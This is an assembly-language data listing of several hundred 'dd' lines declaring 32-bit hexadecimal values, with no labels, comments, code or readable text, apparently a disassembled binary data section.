dd 169A7600h, 42CE3552h, 0EA9E0733h, 0E026F303h, 7109CBECh
dd 0D29A900h, 44D66084h, 2E6D0043h, 0D9033F15h, 0F32CAD55h
dd 0A7009049h, 39CDE1C8h, 1BFA00BDh, 99025A81h, 780E22E2h
dd 203ECE23h, 0CFA2633Ch, 7141F54h, 95AC00B7h, 26FF4A8Dh
dd 0BAE07805h, 46C07B93h, 75CC59E7h, 0A5D00DBh, 511FBFA0h
dd 1400A5B2h, 7F9EC697h, 13AC494Ch, 0FE46B4B7h, 0D687600h
dd 7E922Ah, 0C3617CA1h, 9ACC3A64h, 676DA205h, 308087B3h
dd 0E2D140BEh, 5FF8010Eh, 0E696881Eh, 7B382065h, 0A6B6E203h
dd 0F871493Ah, 80CF40h, 792E1AEEh, 0ACB4B958h, 0D9111201h
dd 8F4749A8h, 2189C0CBh, 0AFF307DEh, 0D0BD2D06h, 2A7625F5h
dd 0A1A0B300h, 0C5022FF8h, 5E3100B2h, 0F74CE636h, 41FFDB4h
dd 0ECD37D18h, 9765AE00h, 3E144B99h, 18040C8h, 0F6B88A7Ah
dd 0D338EBEEh, 0CA8200A0h, 7F6EA178h, 0BBFB00B6h, 0C2207733h
dd 430255A6h, 0A219346Ah, 68F683D7h, 4B07B1EDh, 0A9F8E8h
dd 950D1D53h, 9CDBDF0Eh, 0D45C8B00h, 83E7D08Eh, 359F0038h
dd 0F3567FA3h, 1B3C2995h, 4DEF8001h, 9119CBB1h, 32470054h
dd 6DF325A5h, 9F003BB7h, 0E645D0DEh, 0A78BDCh, 0CD50539Eh
dd 87C369FEh, 0D48ABF00h, 595AEEAh, 71C9B841h, 40CCF74Dh
dd 3F24FC3Fh, 320B80C1h, 760070B3h, 89A1CB30h, 0CFB50300h
dd 3FB11250h, 5C1307E9h, 0B07077C1h, 0FFD72118h, 86009DE6h
dd 279B6B15h, 911B65h, 0AFC8BB87h, 19513FF7h, 0BE08D307h
dd 2EB210h, 0BA4DC33Eh, 0C170022h, 0FE4E9751h, 0A00EAE1Eh
dd 20B25939h, 94FC5475h, 220B038Dh, 431A775Fh, 0D05A08C9h
dd 0BE000301h, 0F86E2CD0h, 0A374B1h, 7712042Bh, 0F1FA69C1h
dd 9BD9010Ah, 0FC0083C4h, 4A2B581Fh, 0F2020E32h, 0C8005192h
dd 3853171Ch, 1DA9B01h, 8C445011h, 3B1B076Bh, 0AED5D721h
dd 23CBB2A1h, 0DEF4019h, 0DDF06180h, 28B44700h, 5BFEAAD3h
dd 850C0064h, 1413AB4Bh, 3CEC7DCEh, 9193881Fh, 86EA0F40h
dd 1FE1F210h, 800A08B4h, 84295941h, 0F100473Fh, 1B771922h
dd 9F03D6h, 85542BE3h, 0D02D8B5Bh, 451CC703h, 0C034012Fh
dd 3F4166h, 39C6FED1h, 7AFD1FE0h, 7B9F1701h, 0CAAD9343h
dd 0F74D4h, 3A511E1Dh, 0DA2DE0BEh, 0F4B68628h, 21D56401h
dd 1996D8C2h, 2615620h, 3E27951Fh, 83C05304h, 981EF939h
dd 0FCC014BDh, 1FABB2AAh, 820500A3h, 0EE62C278h, 9D072A96h
dd 0A04D0F5Bh, 0F3D4FEB0h, 2F3500DCh, 0C81DB567h, 9500A4EEh
dd 0DDC447FAh, 0E0CDECC5h, 0F752006Dh, 33632179h, 0DCEC1EF8h
dd 0D761E614h, 0E3B400B8h, 63B08171h, 871F0136h, 64418250h
dd 0FC88F4C1h, 5B6B1C00h, 678E4734h, 0D5722657h, 0BC2A00D5h
dd 4829810Ch, 86747000h, 0B55F379Ah, 43C80054h, 85960859h
dd 8D0E2E5Ch, 0C00F788Fh, 0B52B04BAh, 0ADD70041h, 6859FD7Fh
dd 5FFCD8BCh, 65936D1Fh, 0ABC67580h, 381CD6h, 0FC984D95h
dd 1B83B1F3h, 0F2C58803h, 0E0104253h, 0D4B223h, 0C9401409h
dd 0E9183C1h, 8D512D1Ch, 370A5F00h, 756027h, 3F7CA481h
dd 0F06A6978h, 54FA25B0h, 0DDB51100h, 0FFBA95Ch, 62700058h
dd 7D4118A4h, 4C00CE7Eh, 0ABDC2FAFh, 733D5h, 0C9FBE861h
dd 36DACF05h, 46BD73Eh, 0F688F925h, 3E1B7580h, 29AA1CDBh
dd 989B80ABh, 0DC0809EBh, 51D20D00h, 8479D503h, 0CC0F00D1h
dd 1482106Eh, 0E600BEFBh, 0AA089536h, 3B40C5D2h, 0B68021BAh
dd 14ED3D4Ch, 8AEE8104h, 0F43C4500h, 0DE6C27Bh, 559E0075h
dd 7AB425DEh, 0D67B6C33h, 0D30B6B0Fh, 2393EE22h, 0E8FD6F88h
dd 0C2FAC3h, 58104CA8h, 21E09708h, 0B00060EAh, 0A2DBFC0Dh
dd 0A3407Eh, 9FAB4D79h, 0C5C318D6h, 76896E0Eh, 8D66E0D0h
dd 0E03B92h, 0F92F7C87h, 0C11C08DBh, 5FBEFF1Eh, 0BB2A5800h
dd 93B2416h, 2B0129B0h, 709D2407h, 0C213396Fh, 38A94800h
dd 0D3D4EA08h, 94AA0009h, 1B897FB1h, 6F05F48Dh, 8263B82Eh
dd 8EF884C0h, 73FA00FFh, 8BEBAF4Ah, 0AD016EEEh, 80CCDC93h
dd 0A7F4A4A0h, 295B00ECh, 5C63B526h, 0F700A9CAh, 7455547Dh
dd 166D622h, 3FEF02Eh, 0EC693A72h, 0E20064E8h, 0F8528A2Bh
dd 3B24BB48h, 4D01440Eh, 0E889E7B0h, 0C1CAECD1h, 0A65B8100h
dd 4F91E20Fh, 0B6F700AAh, 51EFAEA1h, 0F2015C7Eh, 82E9179Ch
dd 0F4C4A71Fh, 0D578005Fh, 677FE858h, 700076C6h, 60F936E9h
dd 0DA8823h, 0E0C52E73h, 715D80C4h, 804B3438h, 0FA5E9C5Ch
dd 1E847A8h, 4419D2B8h, 0C8E5C4C1h, 79E24E8Bh, 7C572400h
dd 0D025A358h, 0BD4B006Ah, 226D1D8Ah, 0ED006576h, 533BC079h
dd 3C237C15h, 0E58048C7h, 0C9B0FA16h, 0CC00F736h, 2FBF0D7Eh
dd 9A75D9h, 328D4DD2h, 11921D0h, 8E9FFB00h, 0F4A62B91h
dd 4EB877h, 56FD790Fh, 196D83E9h, 0C8DCC40Eh, 0B77E2099h
dd 0CB11D5h, 612055CAh, 57D149FBh, 0D28F4F02h, 8078ED6Bh
dd 77B7E884h, 3B29B05Eh, 1480D8BDh, 0D7CCE269h, 46079B40h
dd 0EAAE7212h, 0EC2C85C0h, 71590086h, 3C66CF6Dh, 7E00CA1Bh
dd 0D003B2DFh, 7C3BDC6h, 5BA6778Ah, 0E0C9AE49h, 0A96FA783h
dd 0B01CD7D8h, 28223900h, 0E6CED957h, 0DF5B00D0h, 417211C2h
dd 84001646h, 96ECF2B3h, 0FF0717E4h, 0A6F670h, 77C7E6AEh
dd 0E71A7162h, 5426ED07h, 0B330B0BAh, 0E3BB2Eh, 917B9680h
dd 49B28559h, 0B17A3Eh, 6B8839DBh, 0F445F3BFh, 0E0D40235h
dd 0A74C312h, 6A1B9E80h
dd 7201944Ch, 3FAD7CEFh, 54C08F3Bh, 5D9200EEh, 2BB72924h
dd 7E3A0C65h, 0E7BB00F1h, 2F51A0F2h, 8AF324F4h, 0CF3605B4h
dd 0EC0280C8h, 82C086BBh, 0F6E87389h, 0C9BD4CEFh, 0A336DB00h
dd 0D7DA2633h, 62B3400h, 0AB5C1865h, 0F87F91h, 89CA2E7h
dd 0DB9FC6BDh, 89002F98h, 0A75E5A1Ch, 0F4F4B814h, 69C30017h
dd 1F391383h, 75000CDCh, 24EB1EECh, 0FAC8B9h, 0EE44043Dh
dd 6BC2B898h, 0AE27F900h, 95EC39D5h, 0ACC0154h, 295FA069h
dd 7F94F0C9h, 19247100h, 0FD13D703h, 102800B1h, 57EDE39Bh
dd 6A00DC06h, 0E2731DA1h, 7226948h, 0B7701C16h, 8B5990A8h
dd 170060CFh, 50865166h, 98F3207Eh, 0FB10018h, 0FDBE1139h
dd 0A770FB7Ch, 5F16607h, 0CF90623Bh, 0BF31FCh, 0B2E6ED13h
dd 0DA2B1E4h, 38803303h, 0A06F1B39h, 54CDB5Ch, 1CBD3B9Ah
dd 55E903F4h, 0D0AB97E6h, 80A841D8h, 2ABC5900h, 0F3F50D86h
dd 0FD900507h, 0EFD7D838h, 78755500h, 0A93FA0h, 14490FA8h
dd 898F314Bh, 0E95AF000h, 0BE15F607h, 2AC4006Bh, 4CE36FABh
dd 8600B254h, 909AD079h, 3FF4E710h, 0AF00191Dh, 0BE698C68h
dd 0A8007DBFh, 0FDAC3C0Dh, 12574C6h, 0A5E9BBE5h, 0E8A25F68h
dd 0EA07266Ch, 5BE0B404h, 9674A01Fh, 752D5FBh, 6C7DCCCh
dd 6C60007Ch, 0C3E0401Bh, 2157F600h, 0AE37A0EEh, 0CA23003Ch
dd 2076122Ch, 51009F80h, 9AEA77C3h, 4D1670h, 94ADD2EBh
dd 710BF47Ah, 9D37E101h, 70B724C8h, 0C1D5E8E7h, 442D3DC7h
dd 350DB107h, 0E871404Eh, 3A00D79Bh, 90E5C9B7h, 71934B2h
dd 0C5F5CE84h, 232050EBh, 420E7130h, 80C4BF55h, 9C4C72E5h
dd 4A4132A0h, 1CE0F028h, 5E000B44h, 425FEF19h, 0F3B0987h
dd 0C2173E49h, 47686480h, 43B4D8Ch, 32D40045h, 0D3E44E33h
dd 9BEF0E89h, 0DFFEF0B1h, 60480062h, 36FBF397h, 89C68E00h
dd 46845D2Ch, 39E1036Fh, 9CEC5A95h, 66622DE0h, 69387A1Eh
dd 0ADB68840h, 7DEF31h, 1E758737h, 559AC0Ah, 83CABA3Dh
dd 1BCC9902h, 43619822h, 0B5E60032h, 0F063A8EFh, 0B7001F6Eh
dd 3A1EA6D0h, 337F3Dh, 0E5980F15h, 0EA285DF6h, 0BF01777Dh
dd 314C64BDh, 35ECDD51h, 0BED600A7h, 0FFAAAB59h, 0E30B98E0h
dd 9E9C22h, 0A2D331ABh, 9A760039h, 0D8CC87FCh, 6D7CF74Fh
dd 0C75FF200h, 0ECBEA3A7h, 0CE745Dh, 54B2429Ah, 122D87CDh
dd 1107F07Dh, 0C03438AAh, 0A76FFE27h, 9CD0D88Ah, 0D6B478h
dd 0B9D2C925h, 0AB829129h, 0A70FAAF0h, 0DE0ADBA8h, 9E3AFF1Eh
dd 3681BB45h, 313CBCC5h, 4FEBB0DFh, 0F2300039h, 0FC570E4Bh
dd 8C1D67B1h, 0BED41Ch, 0E760511Bh, 7576DFh, 0F8B06F68h
dd 1A013A44h, 0A31F470Fh, 985C80FBh, 749C0Eh, 0A7593E2Ah
dd 3FA8A1ABh, 527EBF02h, 600DBEC5h, 0EBCC7Ch, 0BA68CEB6h
dd 57D6B735h, 0B180CF00h, 0BF20982Ah, 1576C2h, 0F5F76906h
dd 0E67113B0h, 0CCD49300h, 6B830B0Ch, 53660008h, 3BAF411Eh
dd 0C900C19Fh, 0F6C8DB1h, 0DAA56Ah, 0D0817ECBh, 0F9574A25h
dd 64DFD500h, 0ACF4DD78h, 0C4B2121Dh, 0F59B0074h, 0F33F38EAh
dd 5D4ABA60h, 738B0F65h, 0B6330047h, 4D6A2D79h, 84006FE1h
dd 1E5EE3EFh, 1EBCED93h, 405CC2A0h, 4B3BF034h, 60001098h
dd 291E37D8h, 73E78E79h, 2C120143h, 0E05F9A7Fh, 0FEC4EC35h
dd 2F9CD300h, 2AE23B6h, 0F66307B7h, 10F33B82h, 80422652h
dd 190EC7Fh, 0E12B2A00h, 0B4344046h, 7B70001Fh, 0A033616Fh
dd 0A800C24Ch, 9F7238F7h, 5713Bh, 0EC2FB531h, 2BD8DEE7h
dd 507FBC03h, 0D94D3E1Bh, 59C4935Ch, 0B3D200F0h, 44DA5AABh
dd 9B005462h, 0BBC6E5AEh, 0ED341DFh, 97229523h, 0F6EB70C3h
dd 1DD41AD8h, 61877A00h, 0A6A86455h, 0EF470076h, 0DD146368h
dd 0F0067A4h, 4E84DAC6h, 779DEF8h, 73E13304h, 0AA9F8089h
dd 0D4F4F598h, 0C0927500h, 8D52F6DFh, 1EC4F284h, 80E4DB6Eh
dd 47CBC316h, 3700CAA9h, 2AB78C8Ah, 1F3D4243h, 0D45119h
dd 6C038EB0h, 6371D902h, 0E9652D00h, 4EB4DE5Ah, 3C76006Fh
dd 84642690h, 52009903h, 4BE48843h, 0D79AA8h, 0CB46FA7Ah
dd 916BB0E8h, 0B380E500h, 9A373DBFh, 481C005Bh, 0E8E29C65h
dd 3601FACEh, 9380C56Ah, 77E4B96Bh, 61A03F0h, 52DF9208h
dd 7C10E6B0h, 0EE48620Eh, 4766203Bh, 0A346ABh, 0E239C343h
dd 7760954h, 821CAF00h, 0BCF198D2h, 19ECA4h, 623AC5D5h
dd 914C5CDBh, 8D449600h, 204540A8h, 0D7EA01FEh, 3621B973h
dd 5D4CF45Ch, 2315DF01h, 96146490h, 766E60E8h, 97E50EB3h
dd 68C0D609h, 7C9CF30Ch, 0FA2A8A1Dh, 0DB4900BEh, 0C3597785h
dd 0A7A90EF9h, 6E4099D2h, 279F9846h, 0BAEDFC00h, 0A144AD1Eh
dd 0E6033E30h, 0C07C049Fh, 0C08DEB56h, 8B0020C9h, 66F53FD9h
dd 0EC350B5Ch, 29CA00C8h, 0EF097959h, 0D71E7C6Bh, 9B40F32Eh
dd 0C29A528Ah, 4C5F3D69h, 0AD6D8700h, 0AEE9CB26h, 8BD3900h
dd 5665A932h, 0F98500C2h, 0D3BC438Ch, 5C3D8333h, 79DB0134h
dd 3C4260E1h, 0FCBA94CCh, 22B700D9h, 0E25A2A3Dh, 7801CAB5h
dd 0F9B652DCh, 9BD8D07Ch, 906C0004h, 14B13121h, 0BB0081B5h
dd 0A609150Eh, 0BF384Eh, 47742CCCh, 0C6A81F7Bh, 86A25400h
dd 0BA66B4CAh, 0F4E9003Bh, 0C32AB31h, 0F039338Bh, 8D4780FBh
dd 77C8E8F8h, 15B80039h, 0F9AE4029h, 9300B07Dh, 78306B58h
dd 1657317h, 0B6673FDEh, 0CC53D286h, 0BC0039EFh, 0C24BFBD7h
dd 38232F4Ch, 0F880920Dh, 0D90E9B3Ah, 20004D03h, 0B9877829h
dd 713E69F6h, 0C33B00C4h, 0B9EC1F2h, 0E001310h, 48676B7Ch
dd 574EEAh, 0F37EE079h, 752F235Bh, 0FE7FE700h, 378F8108h
dd 2B5E5CC6h, 3BA6007h, 29E22050h, 260E871Dh, 0E0640D6Dh
dd 690736ABh, 46CA0097h, 5BCC86C1h, 0AA0022A9h, 0AE952A59h
dd 18096Bh, 3163D517h, 0DF04C058h, 0CD80A400h, 69540EA5h
dd 3AD80059h, 494C528Bh, 930EB175h, 895DE27Dh, 2B27019Bh
dd 78E4CFA7h, 0C2300001h, 0FDEF3D55h, 4700AC07h, 0B3C1856Fh
dd 0FE1DEAh, 577A346Eh, 0FB4468DBh, 8FE0C81Dh, 84EDD440h
dd 0A0F629h, 171F1535h, 0C02F8007h, 85A7653Ch, 78799743h
dd 66E549C0h, 0B0D83F45h, 3F6E8730h, 95124681h, 0DA07564Dh
dd 0DA975333h, 35774241h, 45A25E0h, 31621B91h, 0B0668068h
dd 0A648441Eh, 6007163h, 4E53BF42h, 387DFFh, 13095F2Ch
dd 0F0B635FAh, 254A741Ch, 479AB1C0h, 71B8E4h, 7FAA61FCh
dd 0A41C2BECh, 0A1F52800h, 37FD9D76h, 8FFC3E53h, 3F520075h
dd 3D34858Eh, 0DD004071h, 7B7E1EFEh, 3F870FAAh, 0D3035177h
dd 3289156Dh, 0E51E0BD8h, 0F307AB00h, 43D12344h, 0FEC50095h
dd 8F5E479Bh, 0E003C4DAh, 5BA549F8h, 0A067E8D1h, 220601F9h
dd 0F2664E96h, 3835EC79h, 0D030CB00h, 8A73EB71h, 0EF59395Ah
dd 0E36A8380h, 3FDD7FC9h, 8600427Fh, 2AF692CFh, 95F855h
dd 466AFCE0h, 0AC8D0353h, 13778B71h, 97C79C3Fh, 680006F6h
dd 3555E39Dh, 0FA6A00DAh, 1F899661h, 0D1657F7h, 2C00F3C9h
dd 0C4288AF6h, 0CE42005Ah, 57FD2AEAh, 0C600229Ch, 0B23492DFh
dd 7D97FDEh, 24A515BEh, 52B0709Fh, 0D87A0E23h, 9171F70Fh
dd 0BFD3409Ch, 0F88968B1h, 5A941E49h, 0C51D4073h, 439ADE36h
dd 0E976500Fh, 2C2A8021h, 7195527h, 0DF9569FEh, 0C63AE0DAh
dd 0A4F6CEEEh, 4E540D24h, 0E3CF2602h, 80214010h, 6D00122h
dd 0E5B57431h, 0DEDDD8E4h
dd 0BE009F76h, 4AB9A64Ch, 7F2D2E9h, 0DDB8A1Bh, 2C730034h
dd 81B87C98h, 0E0CBE00h, 0DEF6486Fh, 0FFA80BB7h, 0ED0117C7h
dd 0EA6354B6h, 0D3CE281h, 0C135DC0Ah, 179858h, 9CED127Fh
dd 9BF77Dh, 0DF1B82CAh, 0B8AEC617h, 2AC16924h, 1960C200h
dd 0F4BF554Eh, 9D7700AAh, 757D2AD6h, 0C113FF79h, 3002D9Ch
dd 0E66851A5h, 0BBCF1CD2h, 40825E37h, 0F3651A4Bh, 0B2038794h
dd 6C11F741h, 0DC8C8070h, 0A01C0066h, 0F4E4728Ah, 5E009B4Fh
dd 0F06C5997h, 0FD2E53h, 0E85FFC46h, 1FF4C7Bh, 0A5F38E00h
dd 0E734BFDEh, 0DF8600F2h, 28DDEBAEh, 4F00A056h, 8EAAD29Ah
dd 72937CD7h, 9C00078h, 266D665Ah, 2200C9C3h, 7DF5E0A1h
dd 76BE7Eh, 475186C2h, 9385EFC6h, 62490300h, 6791CDCh
dd 6CD8000Ch, 413756CFh, 2B0052ADh, 0A566F35Dh, 33A8CAh
dd 3DD1E169h, 0C0E3BC20h, 0ED26B706h, 822F88h, 0F2B8539Fh
dd 0D6853B68h, 549E200h, 6346F05Dh, 399B02ACh, 0E3E0CA67h
dd 0CB1F11C0h, 0E909617Ch, 38EEE4Ch, 0ECDF9h, 0A070D38Ch
dd 7C67E5D7h, 0C799B200h, 0EBFD409h, 0DC520135h, 8E5042BCh
dd 3622CCA9h, 44FC4F0Fh, 31E6A0E1h, 95570Eh, 0CC4D2BBAh
dd 7E6805E8h, 0FA50881Fh, 8B5D0B00h, 0B95834h, 21FD3D2Fh
dd 98E4FA8h, 0EA1D6BFEh, 15C0DA68h, 357CF073h, 0CD7E00C4h
dd 58591AAEh, 0A93BDF46h, 6D68EF1h, 2285AE66h, 5D4D0D9Ah
dd 0ED88CA43h, 0F3013D6Ch, 6E926333h, 1561C32Ch, 1D23E1E4h
dd 4785C171h, 60F97727h, 0C7D5CCA8h, 5267D001h, 5612B5B8h
dd 8D9EE8h, 8DF4CC8h, 0A4D25DAh, 0EF70C00h, 7C5278F8h
dd 1CE2D4h, 227AC98Bh, 91313FF3h, 0AA306900h, 62050672h
dd 32CF0074h, 1495B212h, 0C179BB1Dh, 0F5DAA00h, 99F551BCh
dd 2EDE0790h, 0A1C68EFFh, 0F73C1D13h, 6C27EDF0h, 64CAD026h
dd 0DB00F324h, 73DC0E7Ch, 0C53385Fh, 78C7170Ch, 8D00D82Eh
dd 6323DAC5h, 0E5E6A8h, 80A626D1h, 9CC66D3Ch, 4E72C800h
dd 173B7BE9h, 1A1103F2h, 4BC7DAD1h, 0B5009C86h, 0C1C341B6h
dd 5EE3D3h, 0A3E41970h, 0B06DEA9Fh, 8F6E3900h, 0B14BBF2h
dd 0E12E00FFh, 0CED5D9BEh, 0A04C9E2Fh, 0E26F13F4h, 0E5A4A04h
dd 3BF094C0h, 4B70E7DBh, 0A2690056h, 306FB5E3h, 0CAFCC9A6h
dd 0BCD7100h, 547A2D7Bh, 0E18F0320h, 0C7E43832h, 0D11E0AB0h
dd 0F8DE443Ch, 765E2800h, 7BC4BD06h, 0D37905h, 0F46127B8h
dd 31770975h, 50C00307h, 0D7F05CEBh, 5DD0589h, 0C2456771h
dd 0FE00EA4Bh, 5D3A3268h, 0CD4E07F2h, 0B0BF23E9h, 6C07EA36h
dd 7E653Ah, 55D95029h, 94C154h, 0AD4EF17Ch, 0C8CD35F5h
dd 0E5FB8C00h, 0B20CD102h, 0B0F000E2h, 9C36494Dh, 0B013C32h
dd 0AACB54B8h, 0A9CCBB3Fh, 0A870006h, 4EED81Dh, 0E1E81FE5h
dd 65E848h, 0F449AE44h, 0B9F8C0h, 0D18DD580h, 0CA38FF76h
dd 7454982Ch, 93CEA500h, 1D3CF04h, 2791E16Fh, 0C0DE06C5h
dd 0AC00E279h, 9B760519h, 58CCBEh, 288C811Ch, 55C9D6AFh
dd 0DC976000h, 85525C35h, 0DFDE03A0h, 0BE055093h, 0A35AF5F8h
dd 0F858B800h, 0CA73A47Fh, 0A06B00CDh, 0ED327B59h, 0F7004634h
dd 0E91F096h, 0E687CB31h, 0E3F475h, 61BB49FAh, 644D1734h
dd 33928900h, 428CA793h, 0C5C200B7h, 36843B57h, 0BB30447Ch
dd 72B6BA8Bh, 0D62200FEh, 13D8CD1Fh, 0B700C275h, 0C1A64265h
dd 75E166Eh, 0B18C6860h, 0FD02304Ch, 81007AF9h, 8C0B67Dh
dd 0E708891h, 87B075C2h, 29355C40h, 2003D68h, 0AB8F7759h
dd 161FDh, 6E04621Eh, 6C8E3554h, 3D66EB05h, 0D7C2710Ch
dd 4E566099h, 85BB002Dh, 42E56562h, 5700FF5Ch, 0E40C6B19h
dd 3D7EB1EAh, 3CFE7BADh, 0F64E47h, 0B0D42016h, 0E31386A0h
dd 73D32600h, 9D14C7EBh, 0A63100E0h, 9C70B556h, 85001CAFh
dd 26D2130Dh, 0FCE28BBh, 0E4E38BCAh, 8D80B380h, 5C721590h
dd 0B0027E00h, 0B653EE2Bh, 946A0013h, 26C5A769h, 1FF4AD48h
dd 0ABB07100h, 6DAE0A9Bh, 31751C3Bh, 0E0870096h, 0B8A60CA9h
dd 4D007FECh, 86DB4C48h, 186B75h, 0E41B752h, 0C719E57Dh
dd 0F0870C00h, 89399F90h, 8FB000BCh, 496E7C46h, 0E21DF810h
dd 0B957D5C9h, 0D4A37600h, 586C1Dh, 0E119623Dh, 0E456198h
dd 12971101h, 0BD4F0B4Eh, 498720h, 0DA8C94C7h, 53BAA8B4h
dd 869DDD00h, 9E51AA71h, 0A78E9h, 60C1F87h, 4BD1A8FCh
dd 997FF73Ah, 9DB2A597h, 3FAFEFCh, 7B6E4956h, 0E9D047CEh
dd 97F418C5h, 0F7A37F00h, 46C155CCh, 969B002Dh, 0E2AEB6E1h
dd 0C000181Fh, 6BD50E40h, 0FA7AE679h, 78230030h, 103689BAh
dd 0AF004019h, 0D0F6ABC6h, 0CBA275h, 9B8BA9B6h, 67F8DC15h
dd 0B0100613h, 982AB0h, 856D4EAEh, 0B8DC5FDh, 0DBA39300h
dd 0FA21E00Ah, 347B0028h, 0F97CF4Ch, 9B2E2273h, 0CE0F397Eh
dd 2FFE001Ch, 0E02331h, 0B061B7C9h, 0CD5E489Bh, 43608D00h
dd 0D47BFEDh, 152E0796h, 0A0B7F3CFh, 8B429468h, 0BB8A1612h
dd 0DA9200BAh, 5B9607A9h, 625F400h, 0CB19C077h, 0F30D005Dh
dd 0C481A38Ch, 2D00C285h, 6FB85BA8h, 4D2F54h, 0DD48D16Bh
dd 1C575103h, 0F818CE03h, 836463C2h, 1F8D894Bh, 0AB9BD8h
dd 61561983h, 51A87D84h, 377293Ah, 0DCD7F20Ch, 0C6B0805Ch
dd 0E4B107B5h, 81C5DD55h, 6A960636h, 0F4F65BB0h, 92250030h
dd 15585A4Ah, 271E59B5h, 0EF8069EDh, 506BDD2Ah, 0D0B700ECh
dd 797D1626h, 0A0009084h, 937F0FD8h, 26559CC3h, 0F5A86Eh
dd 0E14F0661h, 0B600BFD0h, 9196AC84h, 24FC3F9Bh, 34123Ah
dd 170AE7D1h, 790FB1F1h, 608C2A46h, 32433B7h, 10C91DBCh
dd 1D3C0F5Ch, 2F078DEBh, 0C774602Ch, 0DE0052BAh, 9284F1A8h
dd 985645BFh, 3C11001Bh, 4F1D7F01h, 3300CF52h, 690A031Fh
dd 61BDFEh, 0ABBF56A2h, 0DCEFD15Ah, 8B4AEC00h, 0F0B4221Bh
dd 0B1765811h, 810A9600h, 42063371h, 3D58500h, 0B6D26D64h
dd 6EA400CEh, 93913875h, 5E07AF29h, 0B716AC5Dh, 237CB8E0h
dd 3604018Bh, 0F94F92D4h, 0BC84067h, 0C803B39Fh, 0C78EF8A8h
dd 1B74E8D7h, 5FF501B0h, 9964F25Ch, 8E27C817h, 3B004FB8h
dd 978C7F53h, 0E02D18B9h, 6E8F001Bh, 0A181F406h, 9C28F949h
dd 0D800BC7Bh, 0DF6F5121h, 0AE74CBh, 0FDB5D9F2h, 7E439590h
dd 0F03C5800h, 0BD521745h, 0FB09506Bh, 298F3828h, 77B4CD00h
dd 472E4CE6h, 0F4628400h, 6B9E3CD5h, 4B6E0064h, 8D501004h
dd 0D801825Ch, 60EE801Fh, 6BF09396h, 1B1D00D2h, 4730ECE5h
dd 4600CC43h, 0C2295DFAh, 0C0A61C25h, 0D5F8C9B8h, 2700A74Ah
dd 0E72E5506h, 0E2C4118Ch, 821C00CCh, 98212062h, 0BB7DC84Ah
dd 0C9002D75h, 0A65B7A58h, 75686Fh, 4B3E3BA3h, 97E85613h
dd 0DFF75300h, 379ECBFDh, 20490EC6h, 0BE009FB3h, 1B4FF373h
dd 0F8F48407h, 0D3902F6Ah, 0E2D68CA3h, 0A1F7008Bh, 9DACAFDh
dd 0B3002D52h, 0C06A708Eh, 3903DEh, 0C8588E8h, 192EEF51h
dd 0E6098400h, 0F1F8B059h, 685F1276h, 1628006Eh, 0A6EF7F14h
dd 0DD780998h, 58579800h, 37FA3693h, 88A30041h, 0F7C089EDh
dd 0A600ADC5h, 0E92408BCh, 66828h, 9C80C47h, 69489A60h
dd 0A90E8A00h, 0D2236A71h, 6B7D00A1h, 128BFA2h, 0F5776F15h
dd 0DBD64A07h, 1BB03F70h, 0F27A55h, 38C8BD11h, 0C2E96CD7h
dd 0DB791F00h, 0F918FEC6h, 0F98648BEh, 813CFC00h, 2361165Dh
dd 572FC002h, 608D39BCh
dd 9B41EEh, 0CCAECE44h, 0A1E42795h, 6EE89800h, 0E3CA814Dh
dd 0F64800EFh, 278DF26Ch, 3700948Bh, 7875E0F3h, 5896F54Dh
dd 66005F38h, 0F150D801h, 7FE01BDCh, 5DB80900h, 0EEEE763h
dd 919F00D0h, 0DD9AED96h, 0E10073E6h, 0C01F9842h, 0AC3B37h
dd 5FB0C63Ah, 0F67FD49Ah, 81FF493Ch, 5174C70Eh, 0EFE41520h
dd 1FF7E2BCh, 0CF9BF37Eh, 34C0C44Fh, 426DB612h, 0EB672F01h
dd 98F1A61Eh, 65C9C0h, 3FCF561Ch, 88E7F3Eh, 2495393Eh
dd 3703B72Ch, 0D0FD9B23h, 2F5EB8h, 6F013E7Fh, 0E890114Eh
dd 2EC81F00h, 3D430444h, 377372h, 65D77A15h, 0F27ED9B5h
dd 0C8C52900h, 28201732h, 1B980Ah, 0CE4D4FE7h, 7D471B72h
dd 7965F600h, 4C74E532h, 3C77C9h, 852C4B99h, 0B4FB6A3Dh
dd 61B9D0E3h, 0C106FE00h, 0AE51A38Ah, 55D40035h, 0C8C69258h
dd 88007A6Eh, 0FE94E10Ah, 740E3E9h, 9662D96Ah, 3F37C070h
dd 0FC00BAF1h, 0C6502F2Dh, 0EDC57Fh, 5AB84E66h, 75FDF51h
dd 80FDD33Ch, 3DE5FA76h, 562DDBh, 0F670C1FEh, 0BB1B1A7Ch
dd 0B37AA6FCh, 2C3AD801h, 3BD11ED2h, 0EE88F4h, 33329E37h
dd 39B68590h, 29758300h, 8FFF59F7h, 71883A8Bh, 84EB6580h
dd 0B298AB40h, 42782B00h, 7F09F391h, 0C69A02E1h, 664B0AA3h
dd 0EE80FE0h, 36E32001h, 9C19F969h, 0BDF271F8h, 0AA00B8D8h
dd 50178C88h, 0DFEF85h, 99919BA5h, 682D2E3Eh, 0BC26DA03h
dd 0B023B04Dh, 6CC80C9h, 39A11874h, 89E482B6h, 0E3E08D00h
dd 30CDBC81h, 38730017h, 0A8E7C566h, 1BEC01D8h, 0D209B77Dh
dd 5414B4h, 80C1AB3Dh, 6FFA93h, 3B21358Fh, 7F7DA207h, 4BBE9A00h
dd 3152B230h, 0ADD10390h, 0DC03FA06h, 1BEDA3B0h, 373AF200h
dd 40C57A5Dh, 0E32300ACh, 4ABF7451h, 0F6001D24h, 972A7D76h
dd 0CEFA98h, 52A77388h, 5ECDA26Ch, 6005CF4h, 0ECCC3FDDh
dd 66BAF5h, 949A5DB0h, 5F3EB5D6h, 38336D00h, 0E4DE048Dh
dd 3D9E3E4Dh, 7F43C180h, 37A37ACAh, 15220900h, 9B6F7773h
dd 0EE33A81h, 8057BD80h, 0FB5E30DBh, 16B8C607h, 19C0D638h
dd 32E802h, 5ACE9057h, 4068F3A4h, 96132600h, 0CF2C164h
dd 0DF920FA0h, 0B9E0D971h, 2931EF35h, 0A16F9A00h, 32CFE099h
dd 0BF880045h, 8121340Ah, 0ED00DEA0h, 35BB5208h, 40DB7Bh
dd 0EA4D496Eh, 0FC198A2Ch, 9EAC2200h, 4BF49A26h, 95C00AAh
dd 96E75BE5h, 7E00201Ch, 6C6DAE86h, 1D0BB9CBh, 80AD3B1Fh
dd 8959255Ch, 4100D6D2h, 0A4438006h, 66098Ch, 0DC290A47h
dd 0F03E4550h, 0CE62F300h, 0A60E349Bh, 0A5E90054h, 82A30960h
dd 2E00E18Eh, 92414408h, 78D7B2h, 0B4E44A1Ah, 0ABE8D5CCh
